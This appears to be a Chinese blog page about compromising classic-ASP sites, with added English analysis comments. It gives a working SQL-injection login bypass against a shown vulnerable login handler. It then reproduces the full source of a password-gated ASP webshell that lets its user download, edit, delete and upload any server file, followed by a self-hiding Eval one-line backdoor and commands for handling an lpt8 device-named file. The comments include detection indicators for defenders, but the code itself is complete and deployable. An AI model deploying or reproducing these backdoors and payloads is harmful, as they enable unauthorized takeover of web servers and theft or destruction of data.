拿到某源码的SQL入侵思路

' Login handler excerpt (classic ASP / VBScript). Both values come straight from the POST body.
pwd = request.form("pwd")
name = request.form("name")
' This ADODB.Connection is never opened or used; rs is overwritten by conn.Execute two lines down.
' conn itself is presumably created earlier in the page — not shown in this excerpt.
Set rs = Server.CreateObject("ADODB.Connection")
' The submitted name is concatenated into the SQL text with no escaping or parameter binding, so a
' single quote inside it terminates the literal and the remainder of the value is parsed as SQL.
' pwd goes through encrypt() first (not shown); whether that neutralises quotes cannot be told here.
' Mitigation: bind both values as ADODB.Command parameters instead of building the statement string.
sql = "select * from Manage_User where UserName='" & name & "' And PassWord='"&encrypt(pwd)&"'"
Set rs = conn.Execute(sql)
' Any non-empty result set counts as a successful login. The session is filled from the current
' (first) row of the result, not from the submitted name. (This If block continues past the excerpt.)
If Not rs.EOF = True Then
Session("Name") =  rs("UserName")
' The stored password is copied into the session too; nothing after login needs it there.
Session("pwd") =  rs("PassWord")

另外,判断用户是否已登录时检查的是 SESSION

看起来似乎直接SQL注入即可,’or ‘1’=’1,其实不行,虽然结果为真,但是无法登录,因为还判断了SESSION中的名字,所以要   admin’ or 1=1 or ‘1 ,这样输入的用户名就是admin了。而且返回为真。登录成功

 

从一台服务器上找到的一个后门程序(文件上传)

<%@LANGUAGE=VBScript  codepage ="936"%>
<%Server.ScriptTimeOut=6000%>
<object runat=server id=SSyss scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%on error resume next
' Analysis notes on the page-level setup of this backdoor:
' - ScriptTimeOut is raised to 6000 s so that long transfers are not cut off by the default limit.
' - The <object runat=server> tag above instantiates a COM object by CLSID instead of by the
'   "Scripting.FileSystemObject" ProgID; SSyss is used throughout as a FileSystemObject
'   (FileExists, GetFile, GetFolder, Drives). Detection rules that match only the ProgID string miss it.
' - "on error resume next" suppresses every runtime error, so failed file operations fail silently.
' Data_xlsf: page-global ADODB.Stream that holds the raw upload body; shared by both classes below.
dim Data_xlsf
Class upload_xlsf
' Multipart/form-data parser. Reads the whole request body once (Request.BinaryRead) into the
' page-global ADODB.Stream Data_xlsf and indexes it: oForm maps lower-cased field names to their
' text values, objFile maps lower-cased field names to FileInfo records that point INTO Data_xlsf
' (offset + length) rather than holding a copy of the bytes. Driven by the up.asp action below.
dim oForm,objFile,Version
' Form(sForm): case-insensitive lookup of a plain form field; "" when absent.
Public function Form(sForm)
sForm=lcase(sForm)
if not oForm.exists(sForm) then
Form=""
else
Form=oForm(sForm)
end if
end function
' File(strFile): case-insensitive lookup of an uploaded file part. When absent an empty FileInfo is
' returned (FileStart = 0), which makes FileInfo.SaveAs refuse to write.
Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function
' Class_Initialize: the body is parsed eagerly, as soon as "new upload_xlsf" is evaluated.
Private Sub Class_Initialize 
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="xiaolu" ' author tag; a convenient string indicator for this upload class
set oForm=Server.CreateObject("Scripting.Dictionary")
set objFile=Server.CreateObject("Scripting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set tStream = Server.CreateObject("adodb.stream")
' The entire POST body is read into a binary stream; nothing bounds its size except ScriptTimeOut.
set Data_xlsf = Server.CreateObject("adodb.stream")
Data_xlsf.Type = 1
Data_xlsf.Mode =3
Data_xlsf.Open
Data_xlsf.Write  Request.BinaryRead(Request.TotalBytes)
Data_xlsf.Position=0
RequestData =Data_xlsf.Read
iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
' The first line of the body is the multipart boundary; it is searched for again to find the end of
' every part.
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd 
' Part headers run up to the first blank line (CRLF CRLF); they are decoded as gb2312 text.
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_xlsf.Position = iFormStart
Data_xlsf.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
' The next boundary marks the end of this part's data.
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
' name="..." is pulled out of the Content-Disposition header (search starts at fixed offset 22).
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,"filename=""",1) > 0 then
' File part: only WHERE the bytes sit in Data_xlsf is recorded; nothing is copied yet.
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
' The client-supplied filename is split on its last backslash; FileName keeps the last segment only.
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
' The -3 appears to drop the CRLF between the data and the next boundary (1-based byte indices).
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
' The first file part with a given field name wins; later duplicates are ignored.
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
' Plain field: the value is decoded as gb2312 text; repeated field names are joined with ", ".
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_xlsf.Position = iInfoEnd 
Data_xlsf.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText 
tStream.Close
if oForm.Exists(sFormName) then
oForm(sFormName)=oForm(sFormName)&", "&sFormValue		  
else
oForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub
' Class_Terminate: releases the dictionaries and the body stream when the parser is discarded.
Private Sub Class_Terminate  
if Request.TotalBytes>0 then
oForm.RemoveAll
objFile.RemoveAll
set oForm=nothing
set objFile=nothing
Data_xlsf.Close
set Data_xlsf =nothing
end if
End Sub
' GetFilePath / GetFileName: split a client-supplied path on its last backslash
' (forward slashes are not considered).
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End  function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End  function
End Class
Class FileInfo
' Descriptor for one uploaded file part. FileStart/FileSize locate the bytes inside the page-global
' Data_xlsf stream filled by upload_xlsf; FileName/FilePath/FileType come from the client's part headers.
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize 
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
' SaveAs(FullPath): copies this part's bytes out of Data_xlsf to FullPath on disk.
' Returns True when it refused to write (blank path, empty FileInfo, or a path ending in "/") and
' False after a write was attempted — the reverse of the usual success convention.
' FullPath is used as given: no normalisation, extension or directory check, so the file lands
' wherever the IIS worker identity can write. SaveToFile's 2 = adSaveCreateOverWrite.
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_xlsf.position=FileStart
Data_xlsf.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing 
SaveAs=false
end function
End Class
' Request-level context used by every action below.
httpt = Request.ServerVariables("server_name") ' shown as the page title
rseb=Request.ServerVariables("SCRIPT_NAME") ' own URL; every generated link points back to this script
d=request("d") ' action selector, see the select case below
' Access gate: a hard-coded password "angel", checked in a cookie named "password" or in the POSTed
' "password" form field. The literal, the cookie name and the form markup (B1 / LOGIN) are all usable
' as detection indicators in IIS logs and file scans.
if Request.Cookies("password")<>"angel" then 
if trim(request.form("password"))="angel" then 
response.cookies("password")="angel123" 
response.redirect rseb & "?d=ls.asp"
else 
%>
<form method="POST" action="">
Password:<input type="password" name="password"> 
<input type="submit" value="LOGIN" name="B1">
</form>
<%
end if
response.end
end if 
' Dispatch on the d parameter. The five labels (d.asp, ls.asp, e.asp, edir.asp, up.asp) are not
' separate files but this backdoor's actions; a query string such as "?d=ls.asp&path=" in IIS logs
' is the request signature of its directory browser.
select case d
case "d.asp"
' Download action: whatever path arrives in "path" is streamed back, see downloadFile.
call downloadFile(request("path"))
' downloadFile(strFile): streams an arbitrary server file back as an attachment. strFile comes straight
' from the "path" parameter of the d.asp action with no root restriction, so any file readable by the
' IIS worker identity can be fetched; a "d=d.asp&path=" hit in the logs is a file-exfiltration event.
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear%>
<object runat=server id=s scope=page classid="clsid:00000566-0000-0010-8000-00AA006D2EA4"></object>
<%s.Open
' The object tag above is ADODB.Stream, again created by CLSID rather than ProgID. Type 1 = adTypeBinary.
s.Type = 1
if not SSyss.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
Response.End
end if
' Existence and size come from the FileSystemObject; the bytes are read through the stream.
Set f = SSyss.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
' "on error resume next" is in effect, so testing err is the only way a failed load surfaces.
if err then
Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function 
case "ls.asp"
' Directory browser. "path" is the directory to list; attrib=true switches to absolute filesystem
' paths (cpath = path with "/" turned into "\"), otherwise the path is mapped under the web root.
' NOTE(review): "path" on the next line is a bare variable, not Request("path"), and is never assigned
' in this listing, so urlpath is presumably always "" — confirm before relying on it in analysis.
urlpath=server.urlencode(path)
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=replace(lpath,"/","\")
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
' GetFolder: server-side subfolder lister. For each subfolder of cpath it emits a call to the
' client-side VBScript sub so(...) defined later in the page, which renders the link and its delete
' action in the browser. Also emits the parent-directory (上级目录) link built from "oldpath".
Sub GetFolder()
dim theFolder,theSubFolders
if SSyss.FolderExists(cpath)then
Set theFolder=SSyss.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"<a href='" & rseb & "?d=ls.asp&path="&Request("oldpath")&"&attrib="&attrib&"'>上级目录</a><br><script language=vbscript>"
For Each x In theSubFolders
%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%Next%>
</script>
<%
end if
End Sub
' GetFile: same pattern for files — one client-side sf(...) call per file carrying name, size, type,
' attributes and last-modified time. Both branches of the attrib test assign the same value, so
' showstring is always the bare file name. theFolder is not declared here (no Option Explicit).
Sub GetFile()
dim theFiles
if SSyss.FolderExists(cpath)then
Set theFolder=SSyss.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"<table border='0' width='100%' cellpadding='0'><script language=vbscript>" 
For Each x In theFiles
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<% 
Next
end if
Response.write"</script></table>"
End Sub
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<style type="text/css">
<!--
body{font-size: 12px }
a{font-size: 12px; color: rgb(0,32,64); text-decoration: none }
a:hover{color: rgb(255,0,0); text-decoration: none }
a:visited{ color: rgb(128,0,0) }
td{font-size: 12px; line-height: 140%;}
a{color: #000000; text-decoration: none}
a:hover {text-decoration: underline}
-->
</style>
</head>
<script language="JavaScript">
// crf(ls): "create file" button. Opens the editor action (d=e.asp&creat=yes) for the name typed
// into the form, under the current directory lpath; the server values are inlined at render time.
function crf(ls)
{if (ls==""){alert("name?");}
else {window.open("<%=rseb%>?d=e.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
// crd(ls): "create directory" button. Same as crf but targets the edir.asp action with op=creat.
function crd(ls)
{if (ls==""){alert("name?");}
else {window.open("<%=rseb%>?d=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
' sf: client-side renderer called once per file by GetFile. Writes a table row with the file link
' and four actions — 编辑 (edit, e.asp), 删除 (delete, rmd1), 复制 (copy, cfile) and 下载 (download,
' d.asp). The rseb/cpath values are filled in server-side when the page is generated.
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "<tr onMouseOver=""this.style.backgroundColor = '#C6CDDF'"" onMouseOut=""this.style.backgroundColor='#E8F3FF'""><td width='40%'><a href='"& urlpath & lpath & xName &"' target='_blank' title='Type:" & type1 & chr(10) & "Attri:" & Attributes & chr(10) & "Time:" & DateLastModified &"'><strong>" & showstring & "</strong></a></td><td width='15%' align='right'>"& left(DateLastModified,10) &"</td><td width='20%' align='right'>" & size & "b</td><td width='25%' align='right'><a href='<%=rseb%>?d=e.asp&path=" & lpath & xName & "&attrib=" & attrib &"' target='_blank' >编辑</a>|<a href="&chr(34)&"javascript: rmd1('"& lpath & xName &"')"&chr(34)&">删除</a>|<a href='#' onclick=cfile('" & lpath & Name & "')>复制</a>|<a href='<%=rseb%>?d=d.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &"' target='_blank'>下载</a></td></tr>"
end sub
' so: client-side renderer called once per subfolder by GetFolder. Writes a link into the folder
' (ls.asp, carrying the current path as oldpath) plus a 删除 (delete) action handled by rmd.
sub so(lpath,xName,path,attrib)
document.write "<a href='<%=rseb%>?d=ls.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &"'>" & xName &"</a> <a href="&chr(34)&"javascript: rmd('"& lpath & xName &"')"&chr(34)&">删除</a><br>"
end sub
' rmd1: confirm dialog, then opens the file-delete action (e.asp, op=del) for path ls.
sub rmd1(ls)
if confirm("Really del:"&ls)   then
window.open("<%=rseb%>?d=e.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>")
end if
end sub
' rmd: confirm dialog, then opens the folder-delete action (edir.asp, op=del) for path ls.
sub rmd(ls)
if confirm("Really del:"&ls)   then
window.open("<%=rseb%>?d=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
' cfile: prompts for a destination name and opens the copy action (e.asp, op=copy) from sfile to
' dpath. A destination containing ":" or starting with "/" is taken as-is (lp = ""); otherwise it is
' prefixed with the current directory lpath. Drive-letter destinations are rejected unless the page
' is in attrib=true (absolute path) mode.
sub cfile(sfile)
dfile=InputBox("Copy"&Chr(13)&Chr(10)&"file:"&sfile&Chr(13)&Chr(10)&"Input file name:")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then 
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "Path mode error:"&dfile
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open("<%=rseb%>?d=e.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"name?"
end If
end sub
</script>
<body>
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#FFFFFF" align="center" cellspacing="0">
<tr>
<td bgcolor="#C8E3FF" colspan="2" align="center"><b><%=httpt%></b></td>
</tr>
<tr>
<td bgcolor="#EEEEEE" colspan="2">
<%For Each thing in SSyss.Drives
' Drive enumeration through the FileSystemObject; each drive letter links into absolute-path mode.
Response.write "[<a href='" & rseb & "?d=ls.asp&path="&thing.DriveLetter&":&attrib=true'>"&thing.DriveLetter&":</a>]"
NEXT
' The ProgID "WScript.Network" is assembled from fragments ("WS"+"cri"+"pt.Ne"+"twork"), a
' string-splitting trick that defeats a plain grep for the ProgID; scanners should also match the
' fragments or inspect CreateObject arguments after concatenation. It is used only to print the
' host name and the IIS worker identity the shell runs as.
set oScriptNet=Server.CreateObject("WS"+"cri"+"pt.Ne"+"twork")
%> User:<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %></td>
</tr>
<tr>
<td bgcolor="#EEEEEE" colspan="2">
<%if Request("attrib")="true"  then
' Mode toggle between absolute filesystem paths (attrib=true) and paths resolved under the web root
' with Server.MapPath; the resolved path (Rpath) and the current directory (CDir) are echoed below.
response.write "<a href='" & rseb & "?d=ls.asp'>切换到绝对路径</a>"
else
response.write "<a href='" & rseb & "?attrib=true&d=ls.asp'>切换到相对路径</a>"
end if
%>  Rpath:<%=cpath%> | CDir:<%=lpath%></td>
</tr>
<form name="form1" method="post" action="<%=rseb%>?d=up.asp" target="_blank" enctype="multipart/form-data">
<tr><td bgcolor="#EEEEEE" colspan="2">
<input type="text" name="fname" size="20">
<input type="button" value="建文件" onClick="crf(form1.fname.value)">
<input type="button" value="建目录" onClick="crd(form1.fname.value)">
<input type="file" name="file1" style="width:150" value="">
<input type="text" name="filepath" value="<%=cpath%>">
<input type="hidden" name="act" value="upload">
<input type="hidden" name="upcount" value="1">
<input type="submit" value="上传">
</td>
</tr></form>
<tr>
<td width="180" valign="top" bgcolor="#DFEFFF"><%Call GetFolder()%>
</td>
<td width="590" valign="top" bgcolor="#E8F3FF"><%Call GetFile()%>
</td>
</tr>
</table>
<p align="center">Modified by 安静</p>
</body>
</html>
<%case "e.asp"
' Editor action. The HTML head below is always sent; the op parameter (del / copy / edit or create)
' is dispatched further down in the body.
%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb2312">
<title>edit</title>
<style>
<!--
table{font-size: 12px}
a{font-size: 12px; color: rgb(0,32,64); text-decoration: none }
a:hover{color: rgb(255,0,0); text-decoration: underline }
a:visited{color: rgb(128,0,0) }
-->
</style>
</head>
<body>
<%if request("op")="del"  then
' op=del: force-delete the file named by "path" (Delete True also removes read-only files).
' In relative mode the path is resolved under the web root; in attrib=true mode it is used as-is.
if Request("attrib")="true" then
wfile=Request("path")
else
wfile=server.mappath(Request("path"))
end if 
Set thisfile = SSyss.GetFile(wfile)
thisfile.Delete True
Response.write "<script>alert('Del succ!');window.close();</script>"
else
if request("op")="copy" then
' op=copy: copy "path" to "dpath" with the same path-mode rule; FileSystemObject.Copy overwrites.
if Request("attrib")="true" then
wfile=Request("path")
dsfile=Request("dpath")
else
wfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if 
Set thisfile = SSyss.GetFile(wfile)
thisfile.copy dsfile
%>
<script language=vbscript>
msgbox "File:<%=wfile%>" & vbcrlf & "to:<%=dsfile%>" & vbcrlf & "Copy succ!"
window.close()
</script>
<%
else
' No op: edit. With no "text" posted, show the editor; unless creat=yes, the current contents of
' "path" are read (OpenTextFile mode 1 = ForReading) and placed in the textarea.
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
wfile=Request("path")
else
wfile=server.mappath(Request("path"))
end if 
Set thisfile = SSyss.OpenTextFile(wfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%>
<form method="POST" action="<%=rseb%>?d=e.asp">
<input type="hidden" name="attrib" value="<%=Request("attrib")%>">
<table border="0" width="760" cellpadding="0" align="center">
<tr>
<td width="100%">File:<input type="text" name="path" size="45" value="<%=Request("path")%>"> <input type="submit" value="Save" name="B1"><input type="reset" value="Reset" name="B2"></td>
</tr>
<tr>
<td width="100%"><textarea rows="30" name="text" cols="104"><%=editfilecontent(thisline)%></textarea></td>
</tr>
</table>
</form>
<%else
' "text" posted: CreateTextFile overwrites (or creates) "path" with the submitted content. This is
' the shell's arbitrary file write — with the IIS worker identity and no location or type check —
' and is how further scripts get dropped under the web root.
if Request("attrib")="true" then
wfile=Request("path")
else
wfile=server.mappath(Request("path"))
end if 
Set outfile=SSyss.CreateTextFile(wfile)
outfile.WriteLine Request("text")
utfile.close 
set fs=nothing
Response.write "<script>alert('Edit succ!');window.close();</script>"
end if
end if
end if
%>
</body>
</html>
<%case "edir.asp"
' Directory action: op=del removes the folder named by "path" recursively (DeleteFolder ..., True);
' op=creat creates it. Same path-mode rule as e.asp (attrib=true = absolute path, else under web root).
if request("op")="del"  then
if Request("attrib")="true" then
wdir=Request("path")
else
wdir=server.mappath(Request("path"))
end if 
SSyss.DeleteFolder wdir,True
Response.write "<script>alert('Del dir:" & replace(wdir,"\","\\") & " Succ!');window.close();</script>"
else
if request("op")="creat"  then
if Request("attrib")="true" then
wdir=Request("path")
else
wdir=server.mappath(Request("path"))
end if 
SSyss.CreateFolder wdir
Response.write "<script>alert('Create Dir:" & replace(wdir,"\","\\") & " succ!');window.close();</script>"
end if
end if
case "up.asp"
' Upload action (target of the multipart form in the ls.asp view). "filepath" is the destination
' directory; every file part is written there under its client-supplied base name with no extension,
' type or location check — the upload counterpart of the file-write primitive in e.asp.
set upload=new upload_xlsf
if upload.form("filepath")="" then
HtmEnd "Input up path!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
' A trailing "/" is ensured; FileInfo.SaveAs does the remaining (minimal) checks.
if right(formPath,1)<>"/" then formPath=formPath&"/" 
end if
for each formName in upload.objFile
set file=upload.file(formName)
if file.FileSize>0 then
file.SaveAs formPath & file.FileName
' The response echoes the client's original path, the size and the destination written — the
' response body itself is a useful record when reconstructing what was dropped.
response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" Succ!<br>"
end if
set file=nothing
next
set upload=nothing
' HtmEnd(Msg): ends the response. Msg is never used — the text written is always "UP Succ!", even on
' the "Input up path!" error path that calls it.
sub HtmEnd(Msg)
set upload=nothing
Response.write "UP Succ!"
response.end
end sub
%>
<%
' Closes the "select case d" dispatcher; an unknown or missing d value matches no case and renders
' nothing but the trailing tags.
end select
' outcmd(Re): by its name an HTML-escaper for command output, but it is not called anywhere in this
' listing. As reproduced here every Replace except the last maps a character to itself — the
' replacement strings were most likely HTML entities (&nbsp; &lt; &gt;) lost when the page was
' rendered — so only CR -> <br> has any effect.
function outcmd(Re)
Re = Replace(Re," "," ") 
Re = Replace(Re,"<","<") 
Re = Replace(Re,">",">") 
Re = Replace(Re,chr(13),"<br>")
outcmd=re
end function
' editfilecontent(Re): escapes file contents before they are placed in the e.asp textarea. As
' reproduced here both Replace calls map "<" and ">" to themselves (probably &lt;/&gt; lost in
' rendering), so the content is inserted unescaped.
function editfilecontent(Re)
Re = Replace(Re,"<","<") 
Re = Replace(Re,">",">") 
editfilecontent=re
end function
%>
</body>
</html>

从一台被黑的服务器上提取的一长句话

<%
' One-line eval backdoor (一句话木马). Eval executes whatever VBScript arrives in the request parameter
' named chr(112), i.e. "p": scan web roots for the Eval(Request( pattern and watch IIS logs for
' requests carrying that parameter. The rest re-opens the script's own file (PATH_TRANSLATED) and
' forces its attributes to 39 = ReadOnly(1)+Hidden(2)+System(4)+Archive(32), so a plain directory
' listing hides it — hence the attrib -r -s -h step noted at the end of this page.
Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>

不懂ASP,暂时先放到这里存着吧

<%
' Duplicate of the one-liner shown above, kept as on the original page: Eval of request parameter
' chr(112) ("p"), then the file hides itself by setting attributes 39 (ReadOnly+Hidden+System+Archive).
Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>

木马

attrib \\.\D:\\lpt8.ul.asp  -r -s -h 属性处理

copy \\.\D:\\lpt8.ul.asp 1.txt